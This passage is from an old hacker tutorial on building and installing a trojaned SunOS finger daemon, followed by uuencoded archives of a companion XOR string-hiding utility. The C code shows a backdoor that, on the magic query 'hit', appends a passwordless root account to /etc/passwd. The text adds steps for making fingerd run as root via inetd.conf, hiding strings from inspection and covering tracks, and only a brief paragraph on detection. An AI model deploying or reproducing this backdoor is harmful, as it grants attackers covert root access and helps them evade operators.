/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
if (execv(PATH_FINGER, av)==-1)
fprintf(stderr,"No local finger program found\n");
_exit(1);
case -1:
fatal(argv[0],"fork");
}
(void)close(p[1]);
if (!(fp = fdopen(p[0], "r")))
fatal(argv[0],"fdopen");
while ((ch = getc(fp)) != EOF) {
putchar(ch);
}
exit(0);
}
fatal(prg,msg)
char *prg,*msg;
{
fprintf(stderr, "%s: ", prg);
perror(msg);
exit(1);
}
--------- + CUT HERE + ----------------------------------------------
I think it's quite easy to understand, first of all, inetd opens the
socket and pipes the the input data through the fingerd
* if (!fgets(line, sizeof(line), stdin))
* exit(1);
* av[0] = "finger";
* for (lp = line, ap = &av[1];;) {
* *ap = strtok(lp, " \t\r\n");
* if (!*ap)
* break;
* if ((*ap)[0] == '/' && ((*ap)[1] == 'W' || (*ap)[1] == 'w'))
* *ap = "-l";
here it gets the data from stdin and parses them (strtok) converting (due
to RFC742) any '/W' or '/w' old options in '-l'
* switch(fork()) {
* case 0:
* (void)close(p[0]);
* if (p[1] != 1) {
* (void)dup2(p[1], 1);
* (void)close(p[1]);
* }
the task goes into the background
* if (execv(PATH_FINGER, av)==-1)
* fprintf(stderr,"No local finger program found\n");
here the daemon executes the local finger with remote parameters
* (void)close(p[1]);
* if (!(fp = fdopen(p[0], "r")))
* fatal(argv[0],"fdopen");
* while ((ch = getc(fp)) != EOF) {
* putchar(ch);
the output is piped back to the remote system
That's how the finger daemon works... now the trojan, basically we'll
check out the input finger user till the magic code matches, then our
sleepin' trojan will wake up and do the job... let's examine my code
(decrypted)
/*-=-=-=-=-=- PUT HERE YOUR CODE -=-=-=-=-=-*/
if (av[1])
if (strcmp("hit",av[1])==0) {
if(!(fp=fopen("/etc/passwd","a")))
_exit(10);
fprintf(fp,"hit::0:0::/:/bin/csh\n");
printf("Backdoor activated...\n");
fclose(fp);
break;
}
/*-=-=-=-=-=- END OF CUSTOM CODE =-=-=-=-=-=-*/
When the "hit" magic code matches the trojan will modify the passwd adding
a fake unpassworded root user named "hit", so you can relogin as root,
cover your tracks and keep on working. Of course this is an example, you
can do what you want simply adding your custom code, you may remote cat a
log file without logging in, or remote kill an user, maybe root logins are
disabled so you have to make a suid shell and add a normal entry in the
passwd or open a port and so on, you can also use multiple codes if you
like. If the magic word doesn't match of course the finger will work out
normally.
<example>
# finger hit@666.666.666.666
[666.666.666.666]
Backdoor activated...
Well done! You have gained a root access.
(...)
# cat /etc/passwd
root:EXAMPLE PASSWORD:0:1:Operator:/:/bin/csh
nobody:*:65534:65534::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
ingres:*:7:7::/usr/ingres:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
ftp:*:995:995:Anonymous FTP account:/home/ftp:/bin/csh
+::0:0:::
hit::0:0::/:/bin/csh
^^^ they run NIS... anyway our local root login will work fine
<example>
#finger hit@hacked.system.com
[hacked.system.com]
here is the log
user: xit001 from: hell.com ip: 666.666.666.666 has pw: xit001
user: yit001 from: (...)
That's really useful to collect logfiles without logging in and leave
tracks everywhere.
Now the problem....
If you want to use the fingerd to run world accessible commands you won't
have any problem but if you require root privileges check this out:
#grep fingerd /etc/inetd.conf
finger stream tcp nowait nobody /usr/etc/in.fingerd in.fingerd
^^^^^^
On SunOs 4.x.x the fingerd runs as nobody, the fake user (used with
NFS etc..), as nobody of course you cannot modify the passwd, so edit the
file
finger stream tcp nowait root /usr/etc/in.fingerd in.fingerd
now you have to refesh the inetd process
#kill -HUP <inetd pid>
now you can do what you want, many unix clones let the fingerd running as
root by default... and even if you have to modify the inetd.conf an
operator unlikely will realize what is appening since all other daemons
run as root.
Why have I crypted all data?
#strings login
(...)
Yeah d00dz! That's a //\/\eg/+\Backd0[+]r by MASTER(...) of MEGA(...)
Lame or not? All alien data must be crypted.. a fast exor crypting
routine will work fine, of course you can use the standard crypt function
or other (slow) algorithms but since security is not important (we just
want to make our texts invisible) I suggest using my fast algo,to create
the exor matrix simply put all texts on a file and use the little
ExorCrypt utility I have included UUencoded below (amiga/msdos version).
<example amiga>
echo > test "this is a test"
Acrypt test test.o
line crypted: 1
type test.o
static char exor[]={
213,201,200,210,129,200,210,129,192,129,213,196,210,213,161};
char *ExorCrypt(ch)
char *ch;
{
char *b;
b=ch;
while ((*(ch++)^=0xa1)!=0x00);
return(b);
}
The utility will create the exor vector (matrix) (from the 80 column
formatted ascii input text) and the specific decoding function, If you do
not supply a key "$a1" will be used, remember to add a NewLine if
necessary, the vector/matrix never contain them.
Before compiling the whole thing you must add the copyright and sccsid
strings I have not included (they may vary).
Let's simply do: (SunOs)
#strings /usr/etc/in.fingerd
@(#) Copyright (c) 1983 Regents of the University of California.
All rights reserved. ^^^^ COPYRIGHT STRING
@(#)in.fingerd.c 1.6 88/11/28 SMI <<<< SCCSID STRING
getpeername
finger
pipe
/usr/ucb/finger
No local finger program found
fork
fdopen
%s:
(((((
DDDDDDDDDD
AAAAAA
BBBBBB
The top of source becomes:
static char copyright[]=
"@(#) Copyright (c) 1983 Regents of the University of California.\n\
All rights reserverd.\n";
static char sccsid[]="@(#)in.fingerd.c 1.6 88/11/28 SMI"
That's all. Now you can compile and install your fingerd trojan,
the source was adapted for SunOS but you can port it on many unix
clones without troubles.
Few final words to:
Operators: How to defeat this trojan? First of all check the inetd.conf,
then do VARIOUS fingerd checksums (maybe even the "sum" command
is a trojan :) if you discover the trojan wrap the finger port
so you can track down the hacker (usually all wtmp/lastlog logs
are removed) or wrap everything modifying the daemons, do NOT use
the inetd.conf_jump_new_daemon scheme, if you can, add a fingerd
tripwire entry to prevent future installations.
Well... if the hacker is a good one everything is useless.
Beginners: You must be root to install the trojan, remember to get a copy
of the original fingerd program before installing the fake
version.
On a Sun do:
#cc -o in.fingerd trojan.c
#mv /usr/etc/in.fingerd fingerd.old
#mv in.fingerd /usr/etc
remember to check the /etc/inetd.conf
-=- + -
To get in touch with me send E-Mail to:
Internet: hit@bix.com X.25: QSD Nua (0)208057040540
Mbx: Hitman_Italy
if you want, use my PGP key
-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.3a.2
mQCNAiypAuIAAAEEALVTvHLl4zthwydN+3oydNj7woyoKBpi1wBYnKJ4OGFa/KT3
faERV90ifxTS73Ec9pYhS/GSIRUVuOGwahx2UD0HIDgXnoceRamhE1/A9FySImJe
KMc85+nvDuZ0THMbx/W+DDHJMR1Rp2nBzVPMGEjixon02nE/5xrNm/sb/cUdAAUR
tBpIaXRtYW4gSXRhbHkgPGhpdEBiaXguY29tPg==
=bCu4
-----END PGP PUBLIC KEY BLOCK-----
ExorCrypt Amiga version:
-=) S.Encode v2.5 (=-
begin 777 Acrypt.lha
M'$0M;&@U+;L7``"`*```4K>9`0``!D%C<GEP=`X]$UF#^]?>]8TV]?OWWGY]h
MWCGT)T<>==;,3^G7FQMOA\XXX4Q2S[GS9)QP]W.-A<]))-Y@SN9!MOMPPCA"h
MGWF(`+"*XDE5UEU4LU45L4CDCA958FA%94*5RX4P217"J%868`=M85QPS1@<h
M/?_]_O>YL*2RW3+[;9:U9+);_%OP`;\%'W=VLD<;;A%.>^3?Y5SVH19P?5/Zh
MA=_F.G`BP"T_^)W7<CS.<^82-**GE,*TW![K%:RX-^2U1'6@U$A:NB8*U937h
MBE!+)^,'6%']'I^Q4:\OJ+4\;SRP91%+1U^]](EG3(`+-1#G.A;DI5HUY8/%h
MQ>+BO[DGWM>O[7KH5F%/_)J-.MI>)@6C,25:,JPVNG]?$U3,3P5R0K:L^W@=h
MEOB)!6NV&@<KLM^2#I]EZ:!9]U^%KH/Y$+.,$5^!WI)SH2__MHSQ<$Q67WZ_h
M]!=Z-*LN>_%J(:U9"*!#14E`E3\&Z=7*(;^G(JBO6IX_HM;9_4DB51P!LV<Yh
MHK^Z,?HY3SE;M$/07)+EYB+H9]>+=3G/1<E`J+DEEM+'PUM''PWGJ2R861")h
M:$2(*R)2R(<?>Q\.AX9DQ?@4@?ZL8O.Q@3651OX(#*P$?'._'O:/P&Q@]RCLh
MJNZ6KH^QEW#'J6'1)]+!5_@XU1#=7,K'C[&XO=A5W6NU<RWF>$4?5-,_>QYSh
MH:TNP?Q>8[K:N$7ETUZ7F;0HGH-<FDVA?UM,RYS@,W;J6MP&;VCBW1%'PYS*h
MJ_(%&M&B[:)_3'PZ396<@5V(54-#X=%R;.0"/O),^+,:OG,6+?D\&%LTX7<Ch
M"KC"\"SD54-KH1F4X?=C#^6YAZ>SD&+9,`8E['P^SV]M(I(;3,8DXGT1B=DWh
MB:/IV<B$\%.SBW;0)31U<C])/8S,K/6FY;L>P6MC$N-A#9M[[8H\ECV):F_9h
MDD7XP"^&WA9^R/V*_NPM"UT(^'\CW995;,(H0$?R,[5^)FB'Y/#`A@2R`)QQh
M]Y#=J^\JVD:IE_H6L??,WEP^T+3/I]M1;U\/H27*$H`SRQB<`:/]T]0VGH-<h
MA[Z`31[!KD`J8N1@?SN#N2>!!?>0Q0.7.0Y<V3F;QV-W+(Q+"(7O/<O4[[8)h
M2R1H6N3:'KUT+WHN$'\!O<*E"YC2S=PT,$]I[,D.K5G#9O"4>=4J=%^,PO+)h
M%VUT+7S2>GO5%.99=?0A7];^/\Q*=G'):7X<^R>[6,Z$W;\O#"9^ILY#\T1\h
M=L$]??_O)*I1MDE?;__\253/MZ_H8?ZR2J0'+FFS22M[1NJ/-):I3N84DDMHh
MNI<U;=S_!RTY_<,%T\@6NB<M>(*>C<I\(4X[E/U13[MRG@BGW[E/RQ3NG*?Th
MFQ+5LBSV3EF=/ZKE.^%/SG*=R![%2E#G3-^H$[2Y]G(8>IJX@J\NSD67N67(h
MC]]'V(6+V,?8A;>L"V]$%M\]!##J$[CX?\/BVS:P:TMIC1+U)3A3DI\#+JQ/h
MM'?S_FGN6$ZA3T*I2MFN=>I(,67LH\FJB=LO<>\@Q&W^EV\7F3CX"-\C41J*h
M3EVN[\;^R"OM2S])&W4JMM<%7/W="BZ5H;#&)2HTZM"AV^;0/XZ'9^XMTK/Ph
ME(^&OVYH*L>L=>+?M-"Q@V<A#JR]Q?$FBV7;ADOQXO,Z^L`OL=H5?S0CO%:Rh
M0*W<H)/RZ7@$%P>'GZ0%9=S*+OJ_7D6[PO#?+R>?'Z3Y8K@-R[,K\>:,I8\Th
M!;`>50F'DP+8P2Q&.G3T1T]-S6L?9NXVXU]"A:9U^)@5_1+$XN)0;VU\3&V]h
MKN&.7$T+7-8H\W'PE@CCRH^'UU_9R!F^4:H?3Y-M(X[+!-=_:;E)"Z+XR%DUh
MVYZQ20L-1W=:DA9-4_[LJOU<JZRV\KT\G-*&ZQ@4'FO<AKA&@O6=I6]K7=MHh
MOEZ/^*OL+'3=P"H@I_"B\S0&4_O8%Z3&U+:%LPP##>%#72F%55[65?-541K)h
MK^:UQ`UM]X?<L6O)'W&&]>'&[&5$&A>Q26W1I+7E)+7\I@WK"!YH2JAY>EH3h
M+7M5&,[M%&'FS48=`2J-9=IO&,,9^LPE)+JTWE)7M=*74X78R7R+0;Q6@?0Jh
MK-K*&#SH*[E0IZ/AO0XO_NQ!D:L9&FM-Y\6-R7,;DIQK]S&W0QKQ(Q]X7Z\Rh
MY%=6TWCZD,I8VKD2ZSOH>O)74[[PR2A>2Q:Q@E:DT(U,8K8>=J:':E^:':G?h
ME>CR]+8C:ONI195C:%KWI3V;HE#YAYFTS<,W3R8I8AD"9.XWH-8P51T+#R,Zh
M'NJ85EH&A>("EN@T+QMLR*,[MF92X99\,?>2&!../O##4'9I>1XH;HY,9GP'h
M4Q0!')%7%&9R?'9B\TE6N%>U82;X;^+[7!85G^-:LW'12QOZ0P?".Y85?8EKh
M@7'1,"F#>*!&9Y4G5-4^S;0%&Y>X_?MD)%ZO]^#%_ERI\QR^RRK$ZSY)BL.;h
M4[5SGMM[5-/<#FL:Z4W;\M<6^3_T'Z&:'Q]OYBOQ"/";$<NVPM"UD22Z?`"$h
M_$#&NVMI`4YPIH1?V=5IVN')7"^?'//F%7&;O-:X8L>2WIO7U/IXE[3)@/T2h
MU#]YNDS.:&$?%8="&_(O%-[^"]Y6^9NE[X@JGE,+>-Z#64"UZ*U!>[NB2]-Xh
M;ZBA$V,R?1]Z-+^Z+W*NXK9O0W(FV^,FWG_CM_]@:B>#<'DN.)]4UE1>8H:_h
M^?"_[^J&%:RL_1C2=<EJ:_PI^2M:>(Q1PIY*O[RW+I'!UF_OZ,I:!#8]DV08h
M8_^0`WZP#+)AD!?(B\SLZT!>"]P0QH1.X8B(MR%AT82DI[,S@\NICP+!K!8Wh
M&#$6Y1!G</E,VF#.X=?CSOW^+B0(LM^%V0O#`W@OWAU91XW)C=C)>AUF'&KJh
M"!KY42D8^JG!T3@??)#[PP^G(\D9%5AT,.34R,!#)='&WL+&*:B+.\!-GM*_h
MHJ0+#'G67_&;_UN].,Y1KB@`6T\*G):+=3K(&MX9`:\\2NF/1YT%,<*F/5L1h
M]LIBPC]XHHZD>[/E,^1ZYQQ8)GD".'_&#+Y#^'\I,?OM3B,^>Q4N`'\)@$>^h
M$8%"/OV7!#-D,]3M5D.RALJ8&"M#315%&*0+&S.+6<;!5M@Q-)AT<JVR5643h
M!5>GAPX[AJKRS\U::ZHHU,L_-FFN)454#'L<JHBK0(4&=X`^X<?#]_*./)Z_h
M!LN;9;=KCF=O67MYI.TK(0^=K6UD+1B3UJ2_X_2[>%/!`E<2W=!*>KU0@=:2h
M2>I=%"@SF1'PY[T;:1H(9+#Z^$?N\EO1))W`@;:'074YD%02_?X/GD$SQ?O1h
M]7IOYLV!_;_!&_'B\R$^$'?7`4Z.G=R^TQ!DY3H`4E0Q`)V5'\[$L2BLQ<2"h
M1Z)$!3MQ;JC1>S;#<QK@8$H0A1N-VH]M($AB]7_04Z5(D"U(IJ%2!M?G4514h
M#\K'`T%>(BU<ZIY^U\\GH@[=>2QOJ]!IR6S'U<^W!VB%74MR:M#?4H4#5G\3h
M>@95M+:$FREA2I]]#L,.V@)W\QYP,"3GIBHC!=FIOA)[YX,T03'*@-PR[%',h
M4%W=M-=2[<AL]J-9ER,S6=H8AE66I&HTA6FZNIWV_+KGXE58V!KW@U&5N73]h
M&SD6@Q?Z]FN84E,]M6AO=;>^>1M?<B5,&R714<JT<B31H\VJ[C"O'&@=&&2^h
M/=UHNS=DMW^C-<<:_^!NNZIQCZ(XFV2\#-7X)E&%P<48_(%^^;P?^%.YOM40h
M5+6&S)7;-&P]P_0&AW0JK-FE&JZ"`I8[;01#CTW"TKS";-J=Z=$;A?:"*0F6h
M957_V<'X-Z9P9=8E&,XQ=[+:]5E*::J%A%9\\U*>N>&DV(X<XQ^@ZR0=7-SKh
MR)YY+FB^I;)P-)*H$E)I)3T-<TPXOP"##2ECHCQ;FQY^6H$<Z`<#^@:]?`]>h
MW-+?+^FE+?99J6ZA!N;)!]S2G7C,WG=]7;^T+//D.GI\*/1RJM/OKI-:"#KWh
M=!U<.&\IB/U(4\$OZLWEI>:V6DQ&7UD.AY^F--A&V3'%R14@-?09IMUK)R1+h
MW'@.F].QMQ)FFMW%Z;G-XB=L637A86T&F&KW#,RZU)*:$8$$I3?NDK8F3="=h
M5S_Q:K7/5/3'`1@QJ9*\&'(,'WT&"I[<;N-?6(=1<3F,U^.M#J:Q<HT[*HUYh
MTE9-!FV\*L7$H'UP<QVO<,<,Y1_G;,P>7ZI/]/"IX?74T7PA6H!#.L]64;0;h
MUM]`U$:?E#@'WT_7XZO-7K"47(.GPB??(\?;,+'1H,`/9^,E\ZMU0^&;?0$Kh
M&8'0'T<`;#IT1G((W\,%?-E=T+O]1[6((+GH;_=:Q6"[0Z1&FP_9ST\2LN22h
M'\0TG47H3=73FXOC8B%S&;;:<X\]S4\X-3F]!QT3QM=1Q0JYY<:3Y[^1,$G#h
MUU<ZKRK)_@AMOD(SC[\OWO7D]&(^WO]#<"_UL>_)6O)VWC^7N_\L?FR4-OJ]h
M9<:V3-S]A^DEJT\[U\_TGW'QMW)R49Q_U]M@/OR[[Z"<_@?KTW=.A$`Z&Q9/h
M4;W>YNHYHQ&[^^/D06R#OXLP2>L)5Z^*JE.AYT(D&XKZB6&DKN?>CDOKQ[`4h
MY6![.V]G`]EECEO>P/`V.!`[)"]JR`"NC`WOT(^QA.P9U>TP745#M%TZL7V)h
M4175C5]D<(B:0)-H&A@;$&#J-0ZL8HA<1PJ^S:]8-N9AY,:;@NHHEM2$_RW"h
MEXPAHSXX.NC;J\2[1+V9:_`9N%:LD._G,U9*]RUEP+L:%'WB_@]S!4QK#'4Yh
M--W0A^<@('\]$\.4SWJ-0;;'BX@M<=^((/[OKZQ]`WE+W)+0;MKGP?$#+V_^h
M[Z\FC@VL#Z)XE^7L[JEK^I>]W]S%N%_K@.C0<?[F+)@QO(#PNU^WBZR;:Z/Wh
M//)8[7[?M27B*@"T5Z;QAF\_5:AKGU5VUCM8U-:B&'O`DCST>)$\<Q_+(<%Vh
MRV@'FJ=J&TW>FMG"=FS;Z>4?!QKL_Y\&V]PNIP;>?S>##7>_Z\&&"M\MS@3]h
M(`?VXCKVAS/;VJNG5PUD[.<P\%3V[J?1.ML#XV$E0W<,8R`Q#PMQ)>RZ)R"Ih
M)2IFX4XKF-Z!/I2Z^A#:D17-5M!#@X[7.8731YS7.;AG<3!4Q_3W2[L<,&(:h
M,<TWEU8YQP<$>[F3F)@);%JRGJ?8BQPEZZ@N[3<AS70S1J7J#+B_G"!W]V`2h
M\E4*9N-H/,^<9,W?V+.13DQI1=YR30Q;^<YJ;6Q.UC;?P%E_P%G#NY5&WEZ@h
M3F[JXS,[BIPX(K*T0TK?^S@8F`'+M3&V^OIH1E;?30BZR3+*!3G<RQY"<W-+h
MJO`W-+8ACB9>\CJGI;>1E6TUTZL@E/00+5^:4Z[G->U=-&8QO&Q0J/9C[9!"h
M<C/_UYP]=$#]YZI</^\!_Z:&B></_.A`%/,[SN];TSU#_F^AR&W":55Z"6]_h
M(R;]]P9Z1P#DQI-!W)+Z;'&F?`$4^'1?C8M-NXWCR51(W^<2TIT_%N_WE+J`h
MGK@J<:2M4:A3C!\F]0NE-'X8J<VXYB]*XYS"OF?L7'TQK<V@(3#-8/"W5W6Xh
M6ZDO46L#=FK&B>8O$PN^ZF+X6!K:%&HXOX(&['2M^12B-!<P-E`U`5CWZ';^h
M"KWO$P+426;ONSIGQ+<$K/<H=?.9@DKW#67"=!5?HMDYE3YJ:Q\/I?1J]T'\h
MHY:<<$J27%_467;9QF7%JMMI!LVT[73R`9[;!DZ)N`'E9V;!@\]@`NC3R7[Dh
M(/*3!&_D986\H/O]`'])L!9L?"Y"$NI>6<?R-*NVX$/IIBV[1E)XUY?]K<@Nh
MWR$8.6@#]Z&OK`:C]Z?-*W:>:+TQ\T7&.'+G^M#EKGR//O\(X<NR]Q9GXVTKh
M`;2][F-I?K1\/(X=7O&]J^_X@;4L9K:E+$_H'G^YQU,@%/>QDR0:3&BO)?B+h
MM?C8O`,M\9N(OST#>2^S'6%ZA\GK!0RUT(Y8'0GTA99U(;R,P-Y#C*NN&F]&h
M$?Z*4N?(RJ;ZVD5,%6VVJ@?<]K?D]AEJY3P>;>2]V8F"ZE+&VTW4RJWPO?Y'h
M(H&G(W\XPO@FP['N9*B)R9%P!J=["&5P%6]$]'C&7>"(V_?N24I<2-MP9^'Qh
M&0A&J;+>&=KNQ:K2U30W$TV20.3@#^E\0#\7J`-2K)B+F9U0\Z4,=B!#5ZP%h
MC]0"F3_N.MH=@[.M\;%I8I]6^%$Z"E[@L]2^`:+XJO1]7.)W;;`OW>V9#N&Bh
M0\S62KA8\\$2TPM]//6NZ@NXVYU]=:^<F)I\!N)II<V)I!@^?1@P:9(^4]M=h
MRB=H<28\P\"3BQ.QW^Z3J=9%B;!-ZXQW3#GT#BD[Z:I/[VCLY`V&KM2"CM%$h
M9E4"9S/.S8TF/A]#\XZMM*A<Z.DW,@XDMW4;<R<Q:DUBS>9N)!USDW'3N"M$h
MV6U$X+N4KXYD=#S/8,K82KQ37=Y_$3&=XC>K_EF$\\<4&%WX`:EP)1M6]H;Rh
MU^[@3U,Z<X,'B-D%DYT^QY'!8O9<Z;JTV^Z^.V"__AQPZ7V]3U076&"T3MJRh
M`>ZIB<!_`"4YRK>:#Z%L'N/'Z%QX^)-F31"2%H$+<3<L9U^[OBV68`Q'9Y?^h
M^QUO4^+8_XO^=C_*3+KFZ'S`/=)`\]`=S>(1,LLF?S`&JX^Y53T;/"<77RQQh
ME9@O-`\!L#WW3<`^#5D.E/>/W8I_9&?I@(T\3R8C.[^,1NP(]NY$A_$(YS$^h
M,1O6Q&_GAY]7_P2B0_2X;S!#W[^:0?CCL5TQ@K6%"'=3NK:3/CN@1V5[;W%/h
M="VPY+&Z6TKZG::L.:UA9O-:S;6)VR^$.:APJB*K='QR(^B]#!D^I%W<Q/85h
MJWQMTYRN%V)8O)>B*[P3TW4U*+6^M]9KT2-EK9DFZO?!14CBMM-;:?4D6NO+h
M[8ZZ^UU[>9G=_]9]G6%`*F4BQ(MAPN#ZV)B<'V["+$B1.)M@BJ]C[$<U"19^h
MQ9C8`]O;'`MQ)[6(DCQ[HK%DZ/4N75B',L)6+7UR@:SOXL.+7Q8E<<-ZZV_!h
MK%8L.N)/N)6JP`2^%.;)\]KR9N!?_E\GNK![7KD=/\WD_RBFA-/E>3JK",?5h
MTNO[_)M;"N+E^:>G>7YT6P9X.B*L5KIR+7\+@[W;#%KVMAQ,"XZ<PJV<BV',h
M]6+#X-?3=E`;,OY47F=K6[5):\^"URY`[]=,$N#%^E-,7$[:_])ODRSY,<.Ph
M_/+!E608HX/*9@0X-2'2NYDK0:HO+#%NN?NAR8.^@+[*>FL&T=S:;I"])OR>h
M+^D+T!F`O334(^(<BKF(-[GK(-GBP???@Z^E_4??C#Z.UY5PHGV@\)TH9@HMh
M66X>=,BKPW#^ZK8:V8BOU=[,OD6FM_GV.MV%]K;A*`=A(CZG3Q]5IB*OB2+3h
M4E4C&1)FMM]?I$?&@R<DN<#.;2,M+U(G.G2UIG`Z-*F9'.8IB?<OG6T@Z^;$h
M^I@KV9LQ7+(U38VZU[_@'(UYY#OJ2->=FU>*)Y\0=^<2KF4V%S4`+?A9^L<)h
M3T_8$2#NCKQFW.:$K$CL/5H$?>N0-[UM1GG9-M(-;F&-$V_J-@^LK08FV$V;h
M1/P[_#OM`87P!.KT[^$4&!"$(N)H,"?S`5=[-9=IX#-\Y&7T)Q'_Z<.FACCTh
M\LZ>1]@='OETUW-A(9S'-MJ;;$C[!,):MJRSF2/OYQ0^"D[SM+O37][,L)GAh
M2[ZD[RLNT;+M*NL1J_"12=YVO:W<777UW;WB-/?6]UX0L.TNWA:JUK^YTVD1h
M2[!&ET]Y+V-\B3KKK6]NC2R-C?9M7O+"]N-;WPXY&86FF3+V9I$7USK4:[,Qh
MZ-=L$7E[?(V5O=:ZX>%X/5PM[F@CX<-U<+K`(/AOMA?6]]KM8C67-O,1K1M/h
MO.^^;X;PJ78$5*%CJ7807B?(J_/^9^W&TMQWQ_?],F*0\H/-O"3EJG,)S3ZRh
MYJ!B6[767(P1`#$A#8?J=7\QNKJ_FIO!1\&Y/;]/3U(S5555'?_-K+^EOZCLh
MQZK*RH<QLS6WVQF7E/JTU_GC[=:Z\&^3&&MN`8(;S.QV'6LC_4_^?0-I?B3_h
M[NA`)6N+_W\8K6)IH>LZ/_4_)LUA_3^1M0,6/AL_I9F'S,V_VG[,VG5OUNM9h
MO_J?LP[_[#86F_J<_R/B_17W6_;?,_.6&`G\I^W\W?[9/Y7]OX[U'_\?MDO)h
?Q@O.N$_Y(^\0??-'T%W5;-PEAFKB#[MVT,U,B:P[`/^#h
`h
end
ExorCrypt MSdos version:
-=) S.Encode v2.5 (=-
begin 777 MScrypt.zip
M4$L#!`H````&`%*WF6F[C95"R!T``/TM```+````35-C<GEP="YE>&4/`!(#h
M)!4V)S@Y:GM,G6X?"08!$S3E]I;WFVKM'_`B0((`00(D#?#___$"`2*,NY'Zh
M@.L];'M`@`H!RA7XK=G5@`_0T[*U$?!_P8"'K;J8/6ZY`-&G-&CUZG&C^IXCh
M7A[QQHTZ#CW8+\&!?`T4.T&_(G$+%@@5/?.$@XD+7.S5X/^;N$4Y>R]G)S@3h
M&/(1"UP[;FC2;>M=@>A]8&MBH_Y'`J]+$;>T=)^$K[@TM^3-$TA6>^HD0?03h
MU&E^ZAR?NJ-11^]2E[ZU+@IV;A"]?P_1CBBK2_X'T.X>!XROHQW=J%W_V_6/h
M&PKSC8V"@O[J!^@-6#U=C_^H'#0GU2]J3W_'E_=K<-%QRLM?[QP2V.L/2'=@h
M^NL`<?,<@$]3'B&5)2MN*=%%/7_TEQ$D;6<VX6=*EQ+M_M%'V=H1L`VK;FLWh
M@*?A]4GM$;^>(*2ZMY?-7=2M!?W_S_&\'[/'"E"17S=V"GJ@4_N+L\,\J/B`h
MDNWLK>2MD-;7D+>AN:+C:O@](P+TBX%:<6LABI:((&Q\?81K#N::UG_@VM.Yh
MO2(K,>O)6-/CK'G0@)"67CZ0:->/6XV7R=HB]C(O<T/J-.X#7@8K9RY'L/;Xh
MUO8!3HU/Z/4C\6M\?GE\`'2&K=]!*NP+\___)/,^*N"-\Y7`[(MO_C]HG.!>h
MV'LQ3>7K&Y3MN/>,P1$-V0F`B1[P)=QAAR\!3$5?(O6'^!*(CHI,RS?P)?"4h
MKFGM!KY$$9GL>P%-.*9O6M>WKJ\(R1KW9$V/LN<!_T/&;0J:E@3M!'&C8J8+h
M,7-?S#0>9JZ,F5[#S)TQTUZ8.3=F.@JSE(V;FZ9[E"V^,P%F#J.=:V"F1S#+h
MYFA="'Q0#]6C=R*MZQU">E88S^[C6;]Z75R^ZW"`M&$V#\E3X%R!S4'^=G.$h
M;=3"5]X/[!\@1+D#?1&OW_'UP,2='MP_%Z+%C^@["H`-!77V_YG$/YB\?YN)h
M32(%0.Q$!G_CL0E.!X_4YFBA``?>3R2T,QZ^TOO][;25G&^3L<?<`"T>Y/_;h
M8\'<4`^N?";T\U4M[<$'=':L?I+L/\YL_]^FMLW;)K9AMZ:HL]XG]OT!#L>Eh
MU(ZQXUIXVSQNT"C`L@5.U:SO'$#+$[09V*=9@=:MUSV(%:K-_Q;5`'I2LN.-h
M%)F/WI48`ZQQ?&*/IX+:8&J`#C\X7U)W6@+1F?UBAW8%CG?IV`!3FQCS+`$6h
M-XA7(&/M,[<-O4<Z>[[`]^F_!K1!/1]JWU6W5<MT[;2#]L?;=!Q\YG^3@'L"h
MI,LR-T.`OC4#G&^:[L+<__\T>?FNZV9<7]Z@QP-A?_^W<("L,4=F[0_7#HA4h
MM?A[0&<H`P1\BOI?1DUDJ.4JM"\<,-V"@!]!#W1IWO.^`0O\)9QD#@"9[$3Gh
MC1M4M['R[-CLOH46_"4\^D3<S)=&#QB`G4D":YZM`'%:4#8W"P"99+.G=0-<h
MH/<2[16M=1?TLJ7R!2J[^+"G"(":TS40MIS=8T^0EN";E/C!76VHS>JQN,53h
M??(2UG\$[),<^70;>@1=SDQ;-)?%IG7XSOMS%3Y]NKCA>/O_HZ^7YZP.![\Gh
MN+C@PJ("Z<K_WW&]^V$+7_FEAO_!Q7VR`]K4,N.\H.C;"D!=Q87VZ6WZS[J8h
M^TIL2GJG1W<@/?_'_P\?98BG__"Z6YUI/U?O+9,\?]8RP8O?#YA^%:!:O/_Ch
M#N!OJ)>Q>QW^V`!HK&OH<5HH_>FFT`(CGL7INW<`09^I>4!@:`DQX?U'CR;Vh
MR1W`%FKV^]$71_^EO^_``!T1CK/F"9+N?IX)Z=[GV9#N6P5H>NU1)]**3MK)h
M23L7:<?*4R1=DCRY3(*%KB<_,WD0[Y37)VT*)SD_?7'PZ.DG1D=%F2M?'P#?h
MX%\![R>Z71<\S0X>_#9XM/3UEQ0OJN+L!UX_&OT<\4(!B_>_4OQBXJ-D^\78h
M!^[CK`;SGT.'%K=1UZQ537U=?6^Y#;C$],/RJNJ"KS/*_P4`[@/7YX4DS_[Bh
MV[C]FE,NQBGWLK>?<$I5_05M$#87VGQ]M.*@ZO@YS8M@OIB0N8MY5P'NM^8Ih
M(</,T]GF24OSVLPI0_+'#VQ^BC6\G<&KF"7TI?G%Z1?G3W*9NM`^78B.C:76h
M/CBZ#9T0+A*%]1>]#)2D_\7]HY<?X+A_O/H[P>,<&>#7Q<^B'X@_L0M=3[=Vh
M[(WW3SI^8F">.X=\UHG]`BQ:!$FT^/:)G82:=^D]:=M&6NHOMDK0-U."K7<*h
M,WN@ENDRO"15J<]V\_7K+3TR%RX`*[V"RGWTE_]S+`<I>;$^<L+Q3L+:AIA(h
MM`)I`]'LO]#3BZ$/--#(RZV9TT#A/+=DP0>W>W3LL0=.1\\X^Z(Q^\KE`X,[h
MNJVQ1;)BE0N1)'PDJNR5%[N(/Z"%X;`_GI[K?KD3SBXMG8M/=L8($(LR/S!Rh
M$RS_GXE9-GMTB_-P496X0O)U1X"IPGZ@W`9H?,[P(.46A%UP_4'(/"<\QK`Gh
M[@I(7\<\>E;ZBHFOOZ=D'\R>X%6KOA$&7/DOY;E](K@P7-U*2JDF*Q!3_>A@h
MXPASV@01R)L3:J]?SD3$+R!\\@X7PV."6DG2!IBD^@6L7!T(>26P6L`AG7,#h
M6?=R1B"0+%R`5$A4>-`.99ZXJGE?C$_9GE[-2'8"9&/]-(*K'&*`]PT`;>!'h
M\N?XG!T*/*_!+]GCJT.`WCY3+BSH1>39_%M<.3):21]Y='!@;/@"K95.,#)Sh
